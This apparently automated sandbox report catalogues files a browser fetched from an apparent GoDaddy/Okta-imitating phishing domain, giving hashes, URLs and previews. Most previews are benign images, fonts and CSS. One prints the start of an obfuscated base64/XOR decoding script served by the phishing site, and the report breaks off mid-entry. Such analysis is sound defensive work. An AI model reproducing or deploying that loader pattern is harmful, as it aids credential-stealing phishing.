                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/mnpD7x7dx86mlUuPsacoZXPovnPUylHB4a3F4b56z1zt8Os4iQd3ha1L2wx220
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):128
                                                    Entropy (8bit):4.750616928608237
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D90F02F133E7B82AF89B3E58526AC459
                                                    SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                    SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                    SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCV1kjdTFszbHEgUNX1f-DRIFDRObJGMhEHalKei43zYSSglD0pnbN9hKtxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0ISFUTMaFWDwj?alt=proto
                                                    Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:dropped
                                                    Size (bytes):9648
                                                    Entropy (8bit):7.9099172475143416
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4946EB373B18D178C93D473489673BB6
                                                    SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                    SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                    SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):43596
                                                    Entropy (8bit):7.9952701440723475
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                    SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                    SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                    SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/GDSherpa-vf.woff2
                                                    Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10017)
                                                    Category:downloaded
                                                    Size (bytes):10245
                                                    Entropy (8bit):5.437589264532084
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                    SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                    SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                    SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250401%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250401T131821Z&X-Amz-Expires=300&X-Amz-Signature=e0f1ce3176fbaf78c0d47fa674aa1f0a5a9d69335e5f0b940abb3fe3e655df04&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                    Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:very short file (no magic)
                                                    Category:downloaded
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://nzt0.kqnsgn.ru/chai@6bdrysu
                                                    Preview:0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:dropped
                                                    Size (bytes):892
                                                    Entropy (8bit):5.863167355052868
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:41D62CA205D54A78E4298367482B4E2B
                                                    SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                    SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                    SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):644
                                                    Entropy (8bit):4.6279651077789685
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:541B83C2195088043337E4353B6FD60D
                                                    SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                    SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                    SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/uv5h0mg7HpRqFTgJzv0qPNaRQIYstZmHUle2MO7j12122
                                                    Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):10796
                                                    Entropy (8bit):7.946024875001343
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12BDACC832185D0367ECC23FD24C86CE
                                                    SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                    SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                    SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                    Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):270
                                                    Entropy (8bit):4.840496990713235
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:40EB39126300B56BF66C20EE75B54093
                                                    SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                    SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                    SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:dropped
                                                    Size (bytes):1298
                                                    Entropy (8bit):6.665390877423149
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:32CA2081553E969F9FDD4374134521AD
                                                    SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                    SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                    SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (51734)
                                                    Category:downloaded
                                                    Size (bytes):222931
                                                    Entropy (8bit):5.0213311632628725
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0329C939FCA7C78756B94FBCD95E322B
                                                    SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                    SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                    SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                    Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):35786
                                                    Entropy (8bit):5.058073854893359
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                    SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                    SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                    SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/xyuOFnzMCnJTeNrsDMagh26
                                                    Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (19865), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):24916
                                                    Entropy (8bit):5.912905215983793
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D7B1893D36DAFD98B8DF7E5C9B127E35
                                                    SHA1:33145CC9C6B9680EF257C6064ADC5447CB0AB062
                                                    SHA-256:D8B6C44E66FD54FFDDADCE49E5E99E1EEF5E71739C7B3F1226085CF432E97D7C
                                                    SHA-512:3486D8DB7E2518FEB7E931F1E452F5F9BF7F2A8C79F59E48B623A8B0D4C07C0E8B4BC92FA48BC11EE4616F936F2E30CB05382268094C6E82B9342197376970DE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/4woeJ3F2/
                                                    Preview:<script>..function vjxwhwspHo(ZGNPaYDdAT, htaDIrnVbl) {..let hMxckoNhtl = '';..ZGNPaYDdAT = atob(ZGNPaYDdAT);..let YsdsYaBMEf = htaDIrnVbl.length;..for (let i = 0; i < ZGNPaYDdAT.length; i++) {.. hMxckoNhtl += String.fromCharCode(ZGNPaYDdAT.charCodeAt(i) ^ htaDIrnVbl.charCodeAt(i % YsdsYaBMEf));..}..return hMxckoNhtl;..}..var fOGNZUrcQB = vjxwhwspHo(`Ux0GBwUHOU41JgxTRx0YAz0dfHtADQoRCVknHzMxHRdLFgMaYgQ3IQocHFhfWXtAdnoCBwtbBgRvUHp7HA0XHBwDc2NMaBwNFxwcA20dNDdSTA0BGAc+VGl7DAoLHx9ZLgIpIQsICRQeEmMNKTlADw8UFFghByQnQA0XDBwDIkMsJ0BaS0RCRmINNC0fGgpYBgRjAy86QQQWV1JLYh0lJgYeEUthfUBkeicMHAwFGElAZCgxGE4jAAIUOQcpOkcPERoOX2oPEQ0IJSJABBMgAigNNzwTFgVCfjQRHgQNCBleLRUnITInGQIRXhs4NAFtXCIIOwQVChYXNSgoEBErTjknDixXJy0RHBUgPDAwFlsDFisfJQwoBhkMNjdUEQ4sMw03NBUvXjF9DHUdGgo9OwAUJigoDjhbVTkBGzg3dCxeNCIjFjwOJAUwNyQSPAUcPScOJyEtDDQLPg4vIR0sLwIRXhs4NAFtXCIIDRoufyh2NThXEDwoRyonKxIGDFYjXDggJDUNOFsXPAYEAy0oZCEtCCcaLn44Mg44W1U5ATEmNAMCXTQyQFwjCgI8MCg4EC80PiInKyADCzInGhN/Wi8YLCwIETtCJwoBOBkMDDQDLRU0KjYBPxU8JAQDLS8VCCcm
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):35970
                                                    Entropy (8bit):7.989503040923577
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                    SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                    SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                    SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/GDSherpa-bold.woff
                                                    Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):16
                                                    Entropy (8bit):3.5
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCcxP6KUWL3LAEgUNNzCpMCELMTkRT9HfXQ==?alt=proto
                                                    Preview:CgkKBw03MKkwGgA=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):36696
                                                    Entropy (8bit):7.988666025644622
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                    SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                    SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                    SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/GDSherpa-regular.woff
                                                    Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):48316
                                                    Entropy (8bit):5.6346993394709
                                                    Encrypted:false
                                                    SSDEEP:
